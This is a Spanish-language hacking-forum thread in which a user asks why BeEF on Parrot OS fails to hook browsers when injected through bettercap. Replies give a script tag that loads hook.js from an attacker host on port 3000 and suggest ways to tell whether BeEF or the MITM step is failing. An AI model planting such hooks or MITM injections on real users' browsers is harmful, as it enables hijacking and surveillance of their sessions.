Problema con beef en parrot

Iniciado por Slenderhack, Mayo 26, 2017, 11:06:16 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Saludos a todos chicos , espero puedan ayudarme , mi problema es este : intento correr beef pero al hacerlo sale esto

de igual forma se abre el navegador para el panel

pero no puedo hookear , intente haciedo la inyeccion con bettercap pero no , pense que algo estaba haciendo mal asi que intente con el link , entro en mi dispositivo a link sin problema pero al ir al panel de beef no aparece el zombie
Gracias ;)

A que link entras? al que termina en .js?

Eso lo tenes que meter con el tag, como te sale en la consola, adentro de un html y despues entras a ese html

sip efectivamente el de terminacion .js  :) :)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
sip efectivamente el de terminacion .js  :) :)

Como estás haciendo el tag? Recuerda que debes inyectarlo de la manera que quieras, pero que se ejecute javascript, por ejemplo:
Código: javascript
<script src="http://x.x.x.x:3000/hook.js"></script>

estuve siguiendo este metodo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para ver si el problema es de beef o bettercap, mete el tag en un html y abrilo, sin usar bettercap
Tambien podes meterlo desde la consola de chrome, es lo mismo

Si anda, el problema esta en el mitm
Si no anda, el problema es con beef